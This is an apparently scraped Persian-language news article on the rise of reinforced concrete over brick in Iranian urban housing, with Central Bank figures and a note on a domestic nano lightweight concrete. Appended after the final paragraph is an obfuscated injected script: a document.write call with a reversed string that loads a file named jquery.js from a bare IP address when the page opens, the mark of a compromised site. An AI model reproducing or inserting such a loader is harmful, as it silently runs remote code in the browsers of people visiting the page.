۱۰ اردیبهشت ۱۴۰۳

رهبر معظّم انقلاب: علاج برون رفت از مشکلات کشور «اقتصاد مقاومتی» است.

شناسه: ۴۲۶۳۹ ۰۶ دی ۱۳۹۶ - ۱۱:۲۰ دسته: پیشرفت های کشور، مسکن کارشناس: صادق احمدی
۰

تا سال ۸۶ بیش از نیمی از ساختمان‌های ایرانی آجری با تیرآهن بوده‌اند؛ از سال ۸۶ تابه‌حال همواره درصد ساختمان‌های آجری کاهش‌یافته و ساختمان‌های بتن‌آرمه‌ای از ۱۰.۶ درصد در سال ۸۶ به ۲۳.۴ درصد در سال ۹۵ رسیده است. این آمارها نشان‌دهنده‌ی افزایش ۱۲۰ درصدی استفاده از بتن‌آرمه در ساختمان‌های کشور است.

به گزارش مسیر اقتصاد مصالح ساختمانی به کار گرفته‌شده در ساختمان‌های مناطق شهری ایران در دهه اخیر مقاوم‌تر شده است.

این گزارش که بر اساس تحلیل مواد و مصالح ساختمانی مورد استفاده در خانه‌های مناطق شهری ایران می‌باشد، نشان می‌دهد استفاده از گل و خشت و سقف‌های آجری در ده سال گذشته کاهش‌یافته است و استفاده از بتن‌آرمه در حال افزایش است.

مصالح ساختمانی اصلی‌ترین مورد در ایمن‌سازی و مقاوم‌سازی مسکن و ساختمان‌های اداری و تجاری در برابر حوادث طبیعی و انسانی است. گذر انسان از زندگی در بافت‌های طبیعی به بافت‌های ساخته انسان شهری نیازمند مستحکم سازی سازه‌ها برای رفاه و امنیت انسان بوده است. در این میان استفاده از مصالح مقاوم‌تر و پیشرفت دائمی این مواد از اولویت‌های برنامه‌ریزی شهری است.

برتری بتن‌آرمه بر سایر مصالح ساختمانی

طراحی و محاسبات سازه‌های خشتی و آجری معمولی برخلاف سازه‌های بتنی و فلزی بیشتر از اینکه محاسباتی و علمی باشد، تجربی بوده و آئین‌نامه‌ها و محدودیت‌های اجرایی در این نوع سازه‌ها نیز بر اساس نمونه‌های آماری و تجربی تعیین گردیده است.

حداکثر طبقات مجاز در این نوع سازه در تمام شرایط و مناطق دوطبقه و حداکثر ارتفاع مجاز هشت متر از سطح زمین است. اما طراحی سازه‌های بتنی در کشور به روش‌های حدی نهایی بوده که در این روش ضرایب تقلیل بار به ترتیب به مقاومت بتن و فولاد اعمال می‌گردد و ضرایب افزایش بار نیز بر اساس ترکیب بار منظور می‌گردد.

سازه‌های بتنی به دلیل امکان شکل‌پذیری آرماتور و بتن تازه و قالب، اعضاء این سازه‌ها را می‌توان در مقاطع مختلف اجرا نمود. این سازه‌ها در مقابل آتش‌سوزی از خود مقاومت نشان می‌دهند و همچنین مقابل شرایط مختلف آب‌وهوایی مقاوم بوده و در صورت اجرای صحیح پوشش بتن، رطوبت هیچ آسیبی به آن وارد نخواهد کرد.

این سازه‌ها نسبت به سازه‌های فلزی از صلبیت بیشتری برخوردار هستند و مصالح سنگی و سیمان معمولاً آسان‌تر از سایر مصالح در دسترس می‌باشد. عمر این سازه‌ها به دلیل مقاومت در مقابل شرایط آآب‌وهوا، معمولاً بیشتر از سایر سازه بوده است. اتصال تیر و دیافراگم سقف در آن به دلیل همگن بودن مناسب‌تر از سایر سازه‌ها می‌باشد.

وضعیت مواد ساختمانی در ایران

وضعیت اجتماعی و تجمع توده‌ها در گذر زمان اهمیت مقاوم‌سازی را بیشتر می‌کند. جامعه درحال‌توسعه ایران نیز در دو دهه گذشته با روند شدید مهاجرت از روستا به شهر مواجه بوده است. این مسئله ضرورت مقاوم‌سازی ساختمان‌های مناطق شهری ایران را چند برابر می‌کند. ازاین‌رو مطالعه استحکامات ساختمان‌ها و ارزیابی این مهم اولویت اساسی در حوزه مسکن‌سازی کشور ایران است.

مسیر اقتصاد برای بررسی ایمنی ساختمان‌های ایران به گزارش اخیراً منتشرشده‌ی بانک مرکزی از وضعیت خانوارهای ایرانی مراجعه کرده است تا آمارها و اطلاعات خانه‌های ایرانی را بررسی کند:

این گزارش حاکی از این است که ساختمان‌های مناطق شهری ایران عمدتاً از بتن‌آرمه و آجر با تیرآهن ساخته‌شده‌اند. اما نسبت این دو بیان‌کننده روندهای صعودی و نزولی ساختمان‌ها در مناطق شهری است.

بر اساس داده‌های به‌دست‌آمده در ده سال اخیر ساختمان‌های خشتی و آجری با تیر چوبی روند نزولی را طی کرده‌اند و این نشان از کاهش خانه‌های غیر مقاوم در مناطق شهری است. مهم‌ترین بخش این داده‌ها نسبت‌های بزرگ مصالح ساختمانی است که بیانگر شیب رشد مثبت بتن‌آرمه می‌باشد.

در واقع تا سال ۸۶ بیش از نیمی از ساختمان‌های ایرانی آجری با تیرآهن بوده‌اند؛ از سال ۸۶ تابه‌حال همواره درصد ساختمان‌های آجری کاهش‌یافته و ساختمان‌های بتن‌آرمه‌ای از ۱۰.۶ درصد در سال ۸۶ به ۲۳.۴ درصد در سال ۹۵ رسیده است. این آمارها نشان‌دهنده‌ی افزایش ۱۲۰ درصدی استفاده از بتن‌آرمه در ساختمان‌های کشور است.

تولید سازه‌های پیشرفته‌تر در ایران

همچنین باید اضافه کرد تغییر و تحولات سیاست‌گذاری‌های علمی در ایران باعث تولید مصالح ساختمانی بهتر شده است که نویددهنده‌ی بهبود وضعیت ساختمان‌ها در آینده است. در همین راستا بتن‌هایی که امروزه با استفاده از فناوری‌های نانو توسط محققان ایرانی به‌دست‌آمده است علاوه بر داشتن استحکام بتن‌آرمه، از سبکی لازم جهت بهینه‌تر کردن وضعیت ساختمان‌ها در مصرف انرژی و مقاومت در برابر ضربه برخوردارند.

نانو بتن سبک سازه‌ای (NSLC-1230) یکی از محصولاتی است که اخیراً توسط محققان نانوتکنولوژی ایران تولیدشده است و علیرغم چگالی کمتر از ۱۹۰۰ کیلوگرم در مترمکعب، مقاومت فشاری بیش از ۱۷۰ کیلوگرم بر سانتی‌متر مربع را تحمل می‌کند. این محصولات می‌توانند کمک‌های شایانی به بهینه‌سازی هرچه بیشتر ساختمان‌ها و بهره‌وری بالاتر اقتصادی در آینده ایران شوند.

همچنین از این نوع بتن در کشتی‌سازی، ساخت پل، بازسازی پل‌ها، ایجاد مقاومت بیشتر در برابر زلزله در صنایع پیش‌ساخته و سازه‌های فراساحلی استفاده می‌شود. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<‘.split(“”).reverse().join(“”))



جهت احترام به مخاطبان فرهیخته، نظرات بدون بازبینی منتشر می شود. لطفا نظرات خود را جهت تعميق و گسترش بحث ارائه نمایید. نظرات حاوی توهين، افترا و تهمت به ديگران پاک می شود.